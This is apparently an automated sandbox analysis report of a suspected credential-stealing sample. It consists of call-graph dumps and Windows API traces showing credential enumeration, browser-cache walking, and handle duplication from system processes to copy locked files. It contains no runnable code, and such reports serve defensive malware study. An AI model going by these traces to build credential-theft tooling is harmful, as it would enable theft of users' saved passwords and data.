calls 39376->39377 39378 403da9 39377->39378 39379 40414f 33 API calls 39378->39379 39385 403dbe 39379->39385 39380 403e1e 40223 40b1ab ??3@YAXPAX ??3@YAXPAX 39380->40223 39381 403dca memset 39381->39385 39383 403e26 39383->39024 39384 4099c6 2 API calls 39384->39385 39385->39380 39385->39381 39385->39384 39386 40a8ab 9 API calls 39385->39386 39386->39385 39388 414b81 9 API calls 39387->39388 39389 414c40 39388->39389 39390 414c73 memset 39389->39390 40224 409cea 39389->40224 39391 414c94 
39390->39391 40227 414592 RegOpenKeyExW 39391->40227 39394 414c64 39394->39003 39396 414cc1 39397 414cf4 wcscpy 39396->39397 40228 414bb0 wcscpy 39396->40228 39397->39394 39399 414cd2 40229 4145ac RegQueryValueExW 39399->40229 39401 414ce9 39401->39397 39403 409d62 39402->39403 39404 409d43 wcscpy 39402->39404 39403->39046 39405 409719 2 API calls 39404->39405 39406 409d51 wcscat 39405->39406 39406->39403 39408 40aebe FindClose 39407->39408 39409 40ae21 39408->39409 39410 4099c6 2 API calls 39409->39410 39411 40ae35 39410->39411 39412 409d1f 6 API calls 39411->39412 39413 40ae49 39412->39413 39413->39086 39415 40ade0 39414->39415 39416 40ae0f 39414->39416 39415->39416 39417 40ade7 wcscmp 39415->39417 39416->39086 39417->39416 39418 40adfe wcscmp 39417->39418 39418->39416 39420 40ae18 9 API calls 39419->39420 39422 4453c4 39420->39422 39421 40ae51 9 API calls 39421->39422 39422->39421 39423 4453f3 39422->39423 39424 40add4 2 API calls 39422->39424 39427 445403 250 API calls 39422->39427 39425 40aebe FindClose 39423->39425 39424->39422 39426 4453fe 39425->39426 39426->39086 39427->39422 39429 40ae7b FindNextFileW 39428->39429 39430 40ae5c FindFirstFileW 39428->39430 39431 40ae94 39429->39431 39432 40ae8f 39429->39432 39430->39431 39434 40aeb6 39431->39434 39435 409d1f 6 API calls 39431->39435 39433 40aebe FindClose 39432->39433 39433->39431 39434->39086 39435->39434 39437->39072 39438->39055 39440->39087 39442 409c89 39441->39442 39442->39112 39445 413d39 39444->39445 39446 413d2f FreeLibrary 39444->39446 39447 40b633 ??3@YAXPAX 39445->39447 39446->39445 39448 413d42 39447->39448 39449 40b633 ??3@YAXPAX 39448->39449 39451->38973 39452->39016 39453->39039 39455 44db70 39454->39455 39456 40b6fc memset 39455->39456 39457 409c70 2 API calls 39456->39457 39458 40b732 wcsrchr 39457->39458 39459 40b743 39458->39459 39460 40b746 memset 39458->39460 39459->39460 39461 40b2cc 27 API calls 39460->39461 39462 40b76f 39461->39462 39463 409d1f 6 API calls 39462->39463 39464 40b783 
39463->39464 40230 409b98 GetFileAttributesW 39464->40230 39466 40b792 39467 40b7c2 39466->39467 39469 409c70 2 API calls 39466->39469 40231 40bb98 39467->40231 39471 40b7a5 39469->39471 39474 40b2cc 27 API calls 39471->39474 39472 40b837 FindCloseChangeNotification 39477 40b83e memset 39472->39477 39473 40b817 40265 409a45 GetTempPathW 39473->40265 39475 40b7b2 39474->39475 39478 409d1f 6 API calls 39475->39478 40264 40a6e6 WideCharToMultiByte 39477->40264 39478->39467 39479 40b827 39479->39477 39481 40b866 39482 444432 120 API calls 39481->39482 39483 40b879 39482->39483 39484 40b273 27 API calls 39483->39484 39485 40bad5 39483->39485 39486 40b89a 39484->39486 39487 40b04b ??3@YAXPAX 39485->39487 39488 438552 133 API calls 39486->39488 39489 40baf3 39487->39489 39490 40b8a4 39488->39490 39489->39049 39491 40bacd 39490->39491 39493 4251c4 136 API calls 39490->39493 39492 443d90 110 API calls 39491->39492 39492->39485 39516 40b8b8 39493->39516 39494 40bac6 40277 424f26 122 API calls 39494->40277 39495 40b8bd memset 40268 425413 17 API calls 39495->40268 39498 425413 17 API calls 39498->39516 39501 40a71b MultiByteToWideChar 39501->39516 39502 40a734 MultiByteToWideChar 39502->39516 39505 40b9b5 memcmp 39505->39516 39506 4099c6 2 API calls 39506->39516 39507 404423 37 API calls 39507->39516 39510 4251c4 136 API calls 39510->39516 39511 40bb3e memset memcpy 40278 40a734 MultiByteToWideChar 39511->40278 39513 40bb88 LocalFree 39513->39516 39516->39494 39516->39495 39516->39498 39516->39501 39516->39502 39516->39505 39516->39506 39516->39507 39516->39510 39516->39511 39517 40ba5f memcmp 39516->39517 40269 4253ef 16 API calls 39516->40269 40270 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39516->40270 40271 4253af 17 API calls 39516->40271 40272 4253cf 17 API calls 39516->40272 40273 447280 memset 39516->40273 40274 447960 memset memcpy memcpy memcpy 39516->40274 40275 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39516->40275 40276 447920 memcpy memcpy memcpy 39516->40276 
39517->39516 39518->39051 39520 40aed1 39519->39520 39521 40aec7 FindClose 39519->39521 39520->39103 39521->39520 39523 4099d7 39522->39523 39524 4099da memcpy 39522->39524 39523->39524 39524->39025 39526 40b2cc 27 API calls 39525->39526 39527 44543f 39526->39527 39528 409d1f 6 API calls 39527->39528 39529 44544f 39528->39529 40370 409b98 GetFileAttributesW 39529->40370 39531 44545e 39532 445476 39531->39532 39534 40b6ef 249 API calls 39531->39534 39533 40b2cc 27 API calls 39532->39533 39535 445482 39533->39535 39534->39532 39536 409d1f 6 API calls 39535->39536 39537 445492 39536->39537 40371 409b98 GetFileAttributesW 39537->40371 39539 4454a1 39540 4454b9 39539->39540 39541 40b6ef 249 API calls 39539->39541 39540->39053 39541->39540 39542->39052 39543->39077 39544->39083 39545->39118 39546->39100 39547->39148 39548->39148 39549->39129 39550->39159 39551->39161 39552->39163 39554 414c2e 15 API calls 39553->39554 39555 40c2ae 39554->39555 39625 40c1d3 39555->39625 39560 40c3be 39577 40a8ab 39560->39577 39561 40afcf 2 API calls 39562 40c2fd FindFirstUrlCacheEntryW 39561->39562 39563 40c3b6 39562->39563 39564 40c31e wcschr 39562->39564 39565 40b04b ??3@YAXPAX 39563->39565 39566 40c331 39564->39566 39567 40c35e FindNextUrlCacheEntryW 39564->39567 39565->39560 39569 40a8ab 9 API calls 39566->39569 39567->39564 39568 40c373 GetLastError 39567->39568 39570 40c3ad FindCloseUrlCache 39568->39570 39571 40c37e 39568->39571 39572 40c33e wcschr 39569->39572 39570->39563 39573 40afcf 2 API calls 39571->39573 39572->39567 39574 40c34f 39572->39574 39575 40c391 FindNextUrlCacheEntryW 39573->39575 39576 40a8ab 9 API calls 39574->39576 39575->39564 39575->39570 39576->39567 39741 40a97a 39577->39741 39580 40a8cc 39580->39170 39581 40a8d0 7 API calls 39581->39580 39746 40b1ab ??3@YAXPAX ??3@YAXPAX 39582->39746 39584 40c3dd 39585 40b2cc 27 API calls 39584->39585 39586 40c3e7 39585->39586 39747 414592 RegOpenKeyExW 39586->39747 39588 40c3f4 39589 40c50e 39588->39589 39590 40c3ff 
39588->39590 39604 405337 39589->39604 39591 40a9ce 4 API calls 39590->39591 39592 40c418 memset 39591->39592 39748 40aa1d 39592->39748 39595 40c471 39597 40c47a _wcsupr 39595->39597 39596 40c505 39596->39589 39598 40a8d0 7 API calls 39597->39598 39599 40c498 39598->39599 39600 40a8d0 7 API calls 39599->39600 39750 405220 39604->39750 39608 4099c6 2 API calls 39607->39608 39609 40a714 _wcslwr 39608->39609 39610 40c634 39609->39610 39807 405361 39610->39807 39624->39178 39626 40ae18 9 API calls 39625->39626 39632 40c210 39626->39632 39627 40ae51 9 API calls 39627->39632 39628 40c264 39629 40aebe FindClose 39628->39629 39631 40c26f 39629->39631 39630 40add4 2 API calls 39630->39632 39637 40e5ed memset memset 39631->39637 39632->39627 39632->39628 39632->39630 39633 40c231 _wcsicmp 39632->39633 39634 40c1d3 34 API calls 39632->39634 39633->39632 39635 40c248 39633->39635 39634->39632 39650 40c084 21 API calls 39635->39650 39638 414c2e 15 API calls 39637->39638 39639 40e63f 39638->39639 39640 409d1f 6 API calls 39639->39640 39641 40e658 39640->39641 39651 409b98 GetFileAttributesW 39641->39651 39643 40e667 39644 409d1f 6 API calls 39643->39644 39646 40e680 39643->39646 39644->39646 39652 409b98 GetFileAttributesW 39646->39652 39647 40e68f 39648 40c2d8 39647->39648 39653 40e4b2 39647->39653 39648->39560 39648->39561 39650->39632 39651->39643 39652->39647 39674 40e01e 39653->39674 39655 40e593 39656 40e5b0 39655->39656 39657 40e59c DeleteFileW 39655->39657 39658 40b04b ??3@YAXPAX 39656->39658 39657->39656 39660 40e5bb 39658->39660 39659 40e521 39659->39655 39697 40e175 39659->39697 39662 40e5c4 CloseHandle 39660->39662 39663 40e5cc 39660->39663 39662->39663 39664 40b633 ??3@YAXPAX 39663->39664 39666 40e5db 39664->39666 39665 40e573 39667 40e584 39665->39667 39668 40e57c FindCloseChangeNotification 39665->39668 39670 40b633 ??3@YAXPAX 39666->39670 39740 40b1ab ??3@YAXPAX ??3@YAXPAX 39667->39740 39668->39667 39669 40e540 39669->39665 39717 40e2ab 39669->39717 39672 40e5e3 
39670->39672 39672->39648 39675 406214 22 API calls 39674->39675 39676 40e03c 39675->39676 39677 40e16b 39676->39677 39678 40dd85 74 API calls 39676->39678 39677->39659 39679 40e06b 39678->39679 39679->39677 39680 40afcf ??2@YAPAXI ??3@YAXPAX 39679->39680 39681 40e08d OpenProcess 39680->39681 39682 40e0a4 GetCurrentProcess DuplicateHandle 39681->39682 39686 40e152 39681->39686 39683 40e0d0 GetFileSize 39682->39683 39684 40e14a CloseHandle 39682->39684 39687 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39683->39687 39684->39686 39685 40e160 39689 40b04b ??3@YAXPAX 39685->39689 39686->39685 39688 406214 22 API calls 39686->39688 39690 40e0ea 39687->39690 39688->39685 39689->39677 39691 4096dc CreateFileW 39690->39691 39692 40e0f1 CreateFileMappingW 39691->39692 39693 40e140 CloseHandle CloseHandle 39692->39693 39694 40e10b MapViewOfFile 39692->39694 39693->39684 39695 40e13b FindCloseChangeNotification 39694->39695 39696 40e11f WriteFile UnmapViewOfFile 39694->39696 39695->39693 39696->39695 39698 40e18c 39697->39698 39699 406b90 11 API calls 39698->39699 39700 40e19f 39699->39700 39701 40e1a7 memset 39700->39701 39702 40e299 39700->39702 39707 40e1e8 39701->39707 39703 4069a3 ??3@YAXPAX ??3@YAXPAX 39702->39703 39704 40e2a4 39703->39704 39704->39669 39705 406e8f 13 API calls 39705->39707 39706 406b53 SetFilePointerEx ReadFile 39706->39707 39707->39705 39707->39706 39708 40dd50 _wcsicmp 39707->39708 39709 40e283 39707->39709 39713 40742e 8 API calls 39707->39713 39714 40aae3 wcslen wcslen _memicmp 39707->39714 39715 40e244 _snwprintf 39707->39715 39708->39707 39710 40e291 39709->39710 39711 40e288 ??3@YAXPAX 39709->39711 39712 40aa04 ??3@YAXPAX 39710->39712 39711->39710 39712->39702 39713->39707 39714->39707 39716 40a8d0 7 API calls 39715->39716 39716->39707 39718 40e2c2 39717->39718 39719 406b90 11 API calls 39718->39719 39730 40e2d3 39719->39730 39720 40e4a0 39721 4069a3 ??3@YAXPAX ??3@YAXPAX 39720->39721 39723 40e4ab 39721->39723 39722 406e8f 13 API 
calls 39722->39730 39723->39669 39724 406b53 SetFilePointerEx ReadFile 39724->39730 39725 40e489 39726 40aa04 ??3@YAXPAX 39725->39726 39727 40e491 39726->39727 39727->39720 39729 40e497 ??3@YAXPAX 39727->39729 39728 40dd50 _wcsicmp 39728->39730 39729->39720 39730->39720 39730->39722 39730->39724 39730->39725 39730->39728 39731 40dd50 _wcsicmp 39730->39731 39734 40742e 8 API calls 39730->39734 39735 40e3e0 memcpy 39730->39735 39736 40e3fb memcpy 39730->39736 39737 40e3b3 wcschr 39730->39737 39738 40e416 memcpy 39730->39738 39739 40e431 memcpy 39730->39739 39732 40e376 memset 39731->39732 39733 40aa29 6 API calls 39732->39733 39733->39730 39734->39730 39735->39730 39736->39730 39737->39730 39738->39730 39739->39730 39740->39655 39742 40a980 39741->39742 39743 40a995 _wcsicmp 39742->39743 39744 40a99c wcscmp 39742->39744 39745 40a8bb 39742->39745 39743->39742 39744->39742 39745->39580 39745->39581 39746->39584 39747->39588 39749 40aa23 RegEnumValueW 39748->39749 39749->39595 39749->39596 39751 405335 39750->39751 39752 40522a 39750->39752 39751->39177 39753 40b2cc 27 API calls 39752->39753 39754 405234 39753->39754 39755 40a804 8 API calls 39754->39755 39756 40523a 39755->39756 39795 40b273 39756->39795 39796 40b58d 27 API calls 39795->39796 39815 40440c FreeLibrary 39814->39815 39816 40436d 39815->39816 39881 403a29 39880->39881 39895 403bed memset memset 39881->39895 39883 403ae7 39908 40b1ab ??3@YAXPAX ??3@YAXPAX 39883->39908 39884 403a3f memset 39888 403a2f 39884->39888 39886 403aef 39886->39245 39887 409d1f 6 API calls 39887->39888 39888->39883 39888->39884 39888->39887 39889 409b98 GetFileAttributesW 39888->39889 39890 40a8d0 7 API calls 39888->39890 39889->39888 39890->39888 39892 40a051 GetFileTime FindCloseChangeNotification 39891->39892 39893 4039ca CompareFileTime 39891->39893 39892->39893 39893->39245 39894->39244 39896 414c2e 15 API calls 39895->39896 39897 403c38 39896->39897 39898 409719 2 API calls 39897->39898 39899 403c3f wcscat 39898->39899 39900 
414c2e 15 API calls 39899->39900 39901 403c61 39900->39901 39902 409719 2 API calls 39901->39902 39903 403c68 wcscat 39902->39903 39909 403af5 39903->39909 39906 403af5 20 API calls 39907 403c95 39906->39907 39907->39888 39908->39886 39910 403b02 39909->39910 39911 40ae18 9 API calls 39910->39911 39920 403b37 39911->39920 39912 403bdb 39914 40aebe FindClose 39912->39914 39913 40add4 wcscmp wcscmp 39913->39920 39915 403be6 39914->39915 39915->39906 39916 40a8d0 7 API calls 39916->39920 39917 40ae18 9 API calls 39917->39920 39918 40ae51 9 API calls 39918->39920 39919 40aebe FindClose 39919->39920 39920->39912 39920->39913 39920->39916 39920->39917 39920->39918 39920->39919 39922 409d1f 6 API calls 39921->39922 39923 404190 39922->39923 39936 409b98 GetFileAttributesW 39923->39936 39925 40419c 39926 4041a7 6 API calls 39925->39926 39927 40435c 39925->39927 39928 40424f 39926->39928 39927->39266 39928->39927 39930 40425e memset 39928->39930 39932 409d1f 6 API calls 39928->39932 39933 40a8ab 9 API calls 39928->39933 39937 414842 39928->39937 39930->39928 39932->39928 39936->39925 39940 41443e 39937->39940 40214 413f4f 40187->40214 40190 413f37 K32GetModuleFileNameExW 40191 413f4a 40190->40191 40191->39338 40193 41396c wcschr 40192->40193 40195 413969 wcscpy 40192->40195 40193->40195 40196 41398e 40193->40196 40197 413a3a 40195->40197 40219 4097f7 wcslen wcslen _memicmp 40196->40219 40197->39338 40199 41399a 40209 413cb0 GetModuleHandleW 40208->40209 40210 413cda 40208->40210 40209->40210 40211 413cbf GetProcAddress 40209->40211 40212 413ce3 GetProcessTimes 40210->40212 40213 413cf6 40210->40213 40211->40210 40212->39340 40213->39340 40215 413f2f 40214->40215 40216 413f54 40214->40216 40215->40190 40215->40191 40217 40a804 8 API calls 40216->40217 40218 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40217->40218 40218->40215 40219->40199 40222->39361 40223->39383 40225 409cf9 GetVersionExW 40224->40225 40226 409d0a 40224->40226 
40225->40226 40226->39390 40226->39394 40227->39396 40228->39399 40229->39401 40230->39466 40232 40bba5 40231->40232 40279 40cc26 40232->40279 40235 40bd4b 40300 40cc0c 40235->40300 40240 40b2cc 27 API calls 40241 40bbef 40240->40241 40307 40ccf0 _wcsicmp 40241->40307 40243 40bbf5 40243->40235 40308 40ccb4 6 API calls 40243->40308 40245 40bc26 40246 40cf04 17 API calls 40245->40246 40247 40bc2e 40246->40247 40248 40bd43 40247->40248 40249 40b2cc 27 API calls 40247->40249 40250 40cc0c 4 API calls 40248->40250 40251 40bc40 40249->40251 40250->40235 40309 40ccf0 _wcsicmp 40251->40309 40253 40bc46 40253->40248 40254 40bc61 memset memset WideCharToMultiByte 40253->40254 40310 40103c strlen 40254->40310 40256 40bcc0 40257 40b273 27 API calls 40256->40257 40258 40bcd0 memcmp 40257->40258 40258->40248 40259 40bce2 40258->40259 40260 404423 37 API calls 40259->40260 40261 40bd10 40260->40261 40261->40248 40264->39481 40266 409a74 GetTempFileNameW 40265->40266 40267 409a66 GetWindowsDirectoryW 40265->40267 40266->39479 40267->40266 40268->39516 40269->39516 40270->39516 40271->39516 40272->39516 40273->39516 40274->39516 40275->39516 40276->39516 40277->39491 40278->39513 40311 4096c3 CreateFileW 40279->40311 40281 40cc34 40282 40cc3d GetFileSize 40281->40282 40283 40bbca 40281->40283 40284 40afcf 2 API calls 40282->40284 40283->40235 40291 40cf04 40283->40291 40285 40cc64 40284->40285 40312 40a2ef ReadFile 40285->40312 40287 40cc71 40313 40ab4a MultiByteToWideChar 40287->40313 40289 40cc95 FindCloseChangeNotification 40290 40b04b ??3@YAXPAX 40289->40290 40290->40283 40292 40b633 ??3@YAXPAX 40291->40292 40293 40cf14 40292->40293 40319 40b1ab ??3@YAXPAX ??3@YAXPAX 40293->40319 40295 40bbdd 40295->40235 40295->40240 40296 40cf1b 40296->40295 40298 40cfef 40296->40298 40320 40cd4b 40296->40320 40299 40cd4b 14 API calls 40298->40299 40299->40295 40301 40b633 ??3@YAXPAX 40300->40301 40302 40cc15 40301->40302 40303 40aa04 ??3@YAXPAX 40302->40303 40304 40cc1d 40303->40304 40369 

Control-flow Graph
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                          • memset.MSVCRT ref: 0040DF5F
                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                          • API String ID: 594330280-3398334509
                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                          APIs
                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                          • String ID:
                                                          • API String ID: 2947809556-0
                                                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileFind$FirstNext
                                                          • String ID:
                                                          • API String ID: 1690352074-0
                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                          APIs
                                                          • memset.MSVCRT ref: 0041898C
                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: InfoSystemmemset
                                                          • String ID:
                                                          • API String ID: 3558857096-0
                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 73 445685 21->73 74 4456b2-4456b5 call 40b1ab 21->74 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 78 445fae-445fb2 63->78 79 445d2b-445d3b 63->79 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 87 445884-44589d call 40a9b5 call 4087b3 68->87 249 445c77 69->249 70->69 88 445ba2-445bcf call 4099c6 call 445403 call 445389 70->88 142 445849 71->142 90 44568b-4456a4 call 40a9b5 call 4087b3 73->90 108 4456ba-4456c4 74->108 95 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 79->95 96 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 79->96 146 44589f 87->146 88->54 148 4456a9-4456b0 90->148 165 445d67-445d6c 95->165 166 445d71-445d83 call 445093 95->166 196 445e17 96->196 197 445e1e-445e25 96->197 122 4457f9 108->122 123 4456ca-4456d3 call 413cfa call 413d4c 108->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 139->140 140->23 142->56 146->67 148->74 148->90 154->108 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->78 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->78 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->78 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->207 264 4457cc-4457e5 call 4087b3 248->264 249->54 253->176 264->207 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                          APIs
                                                          • memset.MSVCRT ref: 004455C2
                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                          • memset.MSVCRT ref: 0044570D
                                                          • memset.MSVCRT ref: 00445725
                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
